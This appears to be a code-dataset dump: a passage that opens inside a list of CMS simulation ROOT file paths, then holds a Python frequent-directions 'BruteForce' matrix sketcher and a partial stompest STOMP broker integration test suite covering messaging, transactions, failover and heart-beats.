'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/83BD6D39-20DC-AE4A-93CE-A0604AB1BE55.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/8630EF2E-9EC6-9946-982E-A4C157B5B7A9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/86D0FB68-F7A2-2649-9E6B-2D49A482BA95.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/8C2DA017-400F-224D-95DE-9824DCECE98E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/8F4777F6-DEF7-A545-A32C-6315B6772486.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9255A4BB-EF3C-ED4D-811F-0768C19CB5A9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9339D244-3F3B-484F-983B-6FF921C669AC.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/944EFD7D-54B4-D64B-B44D-E6C1B3B936A4.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9483732B-D0D2-6E4B-9E9E-E0B8ABE1F031.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9628BD9C-6E4E-E548-B4F0-3B4ABC4BB261.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/96CF3650-77A0-3649-9F80-B3F09B0A9F8A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/98D8E852-ED3C-E54A-80BA-DE8B98C37398.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9ACAC3C2-0B25-5C4E-9220-71530D28E4C9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9B8AEEF5-7D1C-E243-92C8-1EC1CFC27BBE.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9DCF6A19-0565-024C-8DFD-F7619413DEA7.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9E70111A-8B9B-504D-B28A-93C6E009FA06.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/9EBF7D46-AFB9-1F4B-83F0-639F135B7918.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/A1ECB0DB-D3FF-A741-9AFC-D0DF8BA9DA6C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/A367897E-1FAE-E847-B9BC-6EE067CB7ACA.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/A3CD50BE-2200-7146-9EF8-2E44BC3FB1CC.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/AB255731-385F-BB40-89C3-405BE139B458.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/AD3C4FE4-B1BF-EC44-976F-09DF59154E3E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/AF7A6431-2EC1-AF41-9103-F846648CB826.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B545C91E-270A-5C41-937C-C673BF91D2E2.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B60045B1-6FB1-384C-AE91-E939DF2591E9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B7B5DC5A-9FFF-2348-9EBB-95F36B8D5673.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B86E9CE7-6F5A-9049-8522-236ED9AA7181.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B92BBBB5-2EB9-544B-A685-9C5FB4A148CA.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/B98FDA60-5B9D-A043-A84B-80E58A9C6AC8.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/BC8E5998-3F71-5842-8630-F18439372DA1.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/BCCC85C1-8063-5A47-97AC-FDAC23A9E43D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C14BBECC-3244-3E4E-A079-497DBA522F24.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C2C0EEA6-27F7-CE41-B71D-37C1C8BF3B47.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C58D362D-147D-F74E-88AA-891258127F5E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C712065D-B57D-CB40-AB8F-34A3EBEC3C67.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C8C07EEB-B704-AC48-BE36-0624A80D8376.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/C98D99FC-02C6-4147-8F5E-B46EC5B0595D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CAC8883D-8927-6549-B09D-AFE5A9AF7C6B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CBB7E645-8D71-5342-BCE9-D6DB4EDD4011.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CCACB17A-7EC8-2947-BF9B-B7EB9C100DE7.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CCC3DFE9-387E-B24E-B6C5-8FCC0E6509C4.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/CE57397B-195D-0344-A02D-5A20DA469F89.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D20B7A34-61CC-1244-A837-B91344F18709.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D2536683-026F-FB4C-93DB-D506582625A7.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D2B8F723-A16F-A14A-A631-9435E970B01E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D3F4F9F3-8153-4545-8F27-389AAF65512F.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D486B0A5-374D-5C46-836C-090ACF060682.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D4971DD8-0764-394F-AA84-93825254B832.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D4AF7D3E-44BA-FB42-961D-8A7492E3140E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D4CBF585-C586-A14E-AEF2-786097584A7A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D524DE0C-884B-4147-B79F-195AFD52EBF8.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D7D6C945-6F4B-6547-A9DA-9593B1C65863.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D96BBAFF-ACAF-7B4B-A277-0C6B0DFE03EE.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/D99AD1D0-4E23-5B41-8B39-1DA3AB4DF5AA.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/DAB41616-4FC2-C64D-BBB6-EA332F662005.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/DAD25896-8067-FC47-87A4-D4A41C75143E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/DC95735D-A3C6-F94E-AFE0-B0C05F5C65D4.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E10EF7C2-4F65-E74E-BE5C-ECCC58300813.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E23D0003-7D66-904B-8D7B-659913353094.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E2932D79-4F07-F74C-8951-E76E964FF337.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E3366E88-506E-864D-8EB0-89597FBD8C7C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E6AF960D-B1BD-4243-9032-FF89345A8E2B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E6DE11A5-9C8D-AF44-9D03-10275BF74E1C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E736C29B-E99F-9C41-B331-9C49BAD77CA0.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E77EFD29-F90B-8444-A5FE-875B733F4F7A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E8DACCEA-3E32-7848-B47F-D7A5AB2FD70B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/E94E464D-7863-F343-89AC-979DAD8737A6.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/EB852FB0-60E0-3A42-872A-E79AB497E05B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/EDE432D0-A649-C943-8C8E-B7A4F4F866EE.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/EEB244CE-3042-804A-A2DA-233EFEAF91A5.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/F028EE1D-9CA9-D34B-8249-2E2F71CCD97D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/F4876263-09B5-344F-A218-ACC6284C325F.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/F559302D-0CE2-3E49-AE93-D8AE26CBD03C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/F7780C0A-61CB-9147-B26B-16192EA5A9F9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/FBEA71D1-1339-0445-A7F8-CE8580DC595E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/FE742668-1A9C-8D43-AB59-22B7885B15E9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/FE999DD6-166D-8044-A406-27FC27DB091D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/272686A0-A7C8-754A-A8D3-5370DE966BC8.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/2B9C8E72-3983-2448-9165-DDCB1E9AF1C2.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/47C3EE8E-EC34-4942-B581-BD3A3A5C39BF.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/60064A3B-D343-C44A-9106-F4EB0A38FBA1.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/616D7EAA-1890-A84D-A3D4-CFA0ADD930FF.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/280000/D2D0F93D-E08C-8B41-B5DD-48A0E56E9742.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/70000/1245718C-A726-D543-B2C5-304FAB911516.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/70000/48D8FBBB-C840-F744-BEE3-28119A29E0F4.root',
] )
| [
"noreply@github.com"
] | TreeMaker.noreply@github.com |
3d5501511af19c7e3c24a15ae0a8a668515257fe | 7969d4408b27d49f949b407ac1c2eeba3cd9996f | /frequent_directions_experiments/bruteForce.py | f49c56c940bdf4b27542e94da703dbf699ccc272 | [] | no_license | edoliberty/frequent-directions-experiments | 0a6593a5a8828fcb0bb3bf57b18e3a33fcbfd21a | 06ecc4a1513c9b83c0bda3de1d2cb5ded468e3a0 | refs/heads/master | 2022-06-09T01:51:16.488978 | 2022-05-16T20:28:08 | 2022-05-16T20:28:08 | 36,439,647 | 15 | 8 | null | 2022-05-16T20:28:09 | 2015-05-28T13:20:14 | C | UTF-8 | Python | false | false | 577 | py | from __future__ import absolute_import
from numpy import zeros, dot, outer, diag, sqrt
from numpy.linalg import svd
from .matrixSketcherBase import MatrixSketcherBase
class BruteForce(MatrixSketcherBase):
def __init__(self, d, ell):
self.d = d
self.ell = ell
self.class_name = "BruteForce"
self.covariance = zeros((self.d, self.d))
def append(self, vector):
self.covariance += outer(vector, vector)
def get(self):
(U, s, Vt) = svd(self.covariance)
return dot(diag(sqrt(s[: self.ell])), Vt[: self.ell, :])
| [
"jvavrek@lbl.gov"
] | jvavrek@lbl.gov |
7c2200026809c256c5b8b30d281fe34c0f836b37 | 8297c454dbbfd4307d454bf25dde713f3af5407e | /stompest/tests/sync_client_integration_test.py | 06a296691f1b9816edb6cdc3019a62e7e9a1a8fe | [] | no_license | irdetoakinavci/jbpm-integration-automation | cd3a19ab5ff60a9d73e36f704b459b2c5af9e687 | 0ce346fc955df19920090d1069670b43d588a6d9 | refs/heads/master | 2021-01-10T10:20:29.269353 | 2013-02-28T14:22:23 | 2013-02-28T14:22:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,555 | py | import logging
import unittest
from stompest.config import StompConfig
from stompest.error import StompConnectionError
from stompest.protocol import commands, StompFrame, StompSpec
from stompest.sync import Stomp
import time
logging.basicConfig(level=logging.DEBUG)
LOG_CATEGORY = __name__
from . import HOST, PORT, VERSION, LOGIN, PASSCODE, VIRTUALHOST, BROKER
class SimpleStompIntegrationTest(unittest.TestCase):
DESTINATION = '/queue/stompUnitTest'
TIMEOUT = 0.1
log = logging.getLogger(LOG_CATEGORY)
def getConfig(self, version, port=PORT):
return StompConfig('tcp://%s:%s' % (HOST, port), login=LOGIN, passcode=PASSCODE, version=version)
def setUp(self):
config = self.getConfig(StompSpec.VERSION_1_0)
client = Stomp(config)
client.connect(host=VIRTUALHOST)
client.subscribe(self.DESTINATION, {StompSpec.ACK_HEADER: 'auto'})
client.subscribe(self.DESTINATION, {StompSpec.ID_HEADER: 'bla', StompSpec.ACK_HEADER: 'auto'})
while client.canRead(self.TIMEOUT):
frame = client.receiveFrame()
self.log.debug('Dequeued old %s' % frame.info())
client.disconnect()
def test_1_integration(self):
config = self.getConfig(StompSpec.VERSION_1_0)
client = Stomp(config)
client.connect(host=VIRTUALHOST)
client.send(self.DESTINATION, 'test message 1')
client.send(self.DESTINATION, 'test message 2')
self.assertFalse(client.canRead(self.TIMEOUT))
client.subscribe(self.DESTINATION, {StompSpec.ACK_HEADER: 'client-individual'})
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertFalse(client.canRead(self.TIMEOUT))
def test_2_transaction(self):
config = self.getConfig(StompSpec.VERSION_1_0)
client = Stomp(config)
client.connect(host=VIRTUALHOST)
client.subscribe(self.DESTINATION, {StompSpec.ACK_HEADER: 'client-individual'})
self.assertFalse(client.canRead(self.TIMEOUT))
with client.transaction(4711) as transaction:
self.assertEquals(transaction, '4711')
client.send(self.DESTINATION, 'test message', {StompSpec.TRANSACTION_HEADER: transaction})
self.assertFalse(client.canRead(0))
self.assertTrue(client.canRead(self.TIMEOUT))
frame = client.receiveFrame()
self.assertEquals(frame.body, 'test message')
client.ack(frame)
with client.transaction(4713, receipt='4712') as transaction:
self.assertEquals(transaction, '4713')
self.assertEquals(client.receiveFrame(), StompFrame(StompSpec.RECEIPT, {'receipt-id': '4712-begin'}))
client.send(self.DESTINATION, 'test message', {StompSpec.TRANSACTION_HEADER: transaction})
client.send(self.DESTINATION, 'test message without transaction')
self.assertTrue(client.canRead(self.TIMEOUT))
frame = client.receiveFrame()
self.assertEquals(frame.body, 'test message without transaction')
client.ack(frame)
self.assertFalse(client.canRead(0))
frames = [client.receiveFrame() for _ in xrange(2)]
frames = list(sorted(frames, key=lambda f: f.command))
frame = frames[0]
client.ack(frame)
self.assertEquals(frame.body, 'test message')
frame = frames[1]
self.assertEquals(frame, StompFrame(StompSpec.RECEIPT, {'receipt-id': '4712-commit'}))
try:
with client.transaction(4714) as transaction:
self.assertEquals(transaction, '4714')
client.send(self.DESTINATION, 'test message', {StompSpec.TRANSACTION_HEADER: transaction})
raise RuntimeError('poof')
except RuntimeError as e:
self.assertEquals(str(e), 'poof')
else:
raise
self.assertFalse(client.canRead(self.TIMEOUT))
client.disconnect()
def test_3_timeout(self):
timeout = 0.2
client = Stomp(StompConfig(uri='failover:(tcp://localhost:61610,tcp://localhost:61613)?startupMaxReconnectAttempts=1,randomize=false', login=LOGIN, passcode=PASSCODE, version=StompSpec.VERSION_1_0))
client.connect(host=VIRTUALHOST, connectTimeout=timeout)
client.disconnect()
client = Stomp(StompConfig(uri='failover:(tcp://localhost:61610,tcp://localhost:61611)?startupMaxReconnectAttempts=1,backOffMultiplier=3', login=LOGIN, passcode=PASSCODE, version=StompSpec.VERSION_1_0))
self.assertRaises(StompConnectionError, client.connect, host=VIRTUALHOST, connectTimeout=timeout)
client = Stomp(StompConfig(uri='failover:(tcp://localhost:61610,tcp://localhost:61613)?randomize=false', login=LOGIN, passcode=PASSCODE, version=StompSpec.VERSION_1_0)) # default is startupMaxReconnectAttempts = 0
self.assertRaises(StompConnectionError, client.connect, host=VIRTUALHOST, connectTimeout=timeout)
def test_3_socket_failure_and_replay(self):
client = Stomp(self.getConfig(StompSpec.VERSION_1_0))
client.connect(host=VIRTUALHOST)
headers = {StompSpec.ACK_HEADER: 'client-individual'}
token = client.subscribe(self.DESTINATION, headers)
client.sendFrame(StompFrame('DISCONNECT')) # DISCONNECT frame is out-of-band, as far as the session is concerned -> unexpected disconnect
self.assertRaises(StompConnectionError, client.receiveFrame)
client.connect(host=VIRTUALHOST)
client.send(self.DESTINATION, 'test message 1')
client.ack(client.receiveFrame())
client.unsubscribe(token)
headers = {'id': 'bla', StompSpec.ACK_HEADER: 'client-individual'}
client.subscribe(self.DESTINATION, headers)
headers[StompSpec.DESTINATION_HEADER] = self.DESTINATION
client.sendFrame(StompFrame('DISCONNECT')) # DISCONNECT frame is out-of-band, as far as the session is concerned -> unexpected disconnect
self.assertRaises(StompConnectionError, client.receiveFrame)
client.connect(host=VIRTUALHOST)
client.send(self.DESTINATION, 'test message 2')
client.ack(client.receiveFrame())
client.unsubscribe(('id', 'bla'))
client.disconnect()
def test_4_integration_stomp_1_1(self):
if StompSpec.VERSION_1_1 not in commands.versions(VERSION):
print 'This broker does not support STOMP protocol version 1.1'
return
client = Stomp(self.getConfig(StompSpec.VERSION_1_1))
client.connect(host=VIRTUALHOST)
client.send(self.DESTINATION, 'test message 1')
client.send(self.DESTINATION, 'test message 2')
self.assertFalse(client.canRead(self.TIMEOUT))
token = client.subscribe(self.DESTINATION, {StompSpec.ID_HEADER: 4711, StompSpec.ACK_HEADER: 'client-individual'})
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertFalse(client.canRead(self.TIMEOUT))
client.unsubscribe(token)
client.send(self.DESTINATION, 'test message 3', receipt='4711')
self.assertTrue(client.canRead(self.TIMEOUT))
self.assertEquals(client.receiveFrame(), StompFrame(StompSpec.RECEIPT, {'receipt-id': '4711'}))
self.assertFalse(client.canRead(self.TIMEOUT))
client.subscribe(self.DESTINATION, {StompSpec.ID_HEADER: 4711, StompSpec.ACK_HEADER: 'client-individual'})
self.assertTrue(client.canRead(self.TIMEOUT))
client.ack(client.receiveFrame())
self.assertFalse(client.canRead(self.TIMEOUT))
client.disconnect(receipt='4712')
self.assertEquals(client.receiveFrame(), StompFrame(StompSpec.RECEIPT, {'receipt-id': '4712'}))
self.assertRaises(StompConnectionError, client.receiveFrame)
client.connect(host=VIRTUALHOST)
client.disconnect(receipt='4711')
self.assertEquals(client.receiveFrame(), StompFrame(StompSpec.RECEIPT, {'receipt-id': '4711'}))
client.close()
self.assertRaises(StompConnectionError, client.canRead, 0)
def test_5_integration_stomp_1_1_heartbeat(self):
if BROKER == 'apollo':
print "Broker %s doesn't properly support heart-beating. Skipping test." % BROKER
return
if StompSpec.VERSION_1_1 not in commands.versions(VERSION):
print 'This broker does not support STOMP protocol version 1.1'
return
port = 61612 if (BROKER == 'activemq') else PORT # stomp+nio on 61613 does not work properly, so use stomp on 61612
client = Stomp(self.getConfig(StompSpec.VERSION_1_1, port))
self.assertEquals(client.lastReceived, None)
self.assertEquals(client.lastSent, None)
heartBeatPeriod = 100
client.connect(host=VIRTUALHOST, heartBeats=(heartBeatPeriod, heartBeatPeriod))
self.assertTrue((time.time() - client.lastReceived) < 0.1)
if not (client.serverHeartBeat and client.clientHeartBeat):
print 'broker does not support heart-beating. disconnecting ...'
client.disconnect()
client.close()
return
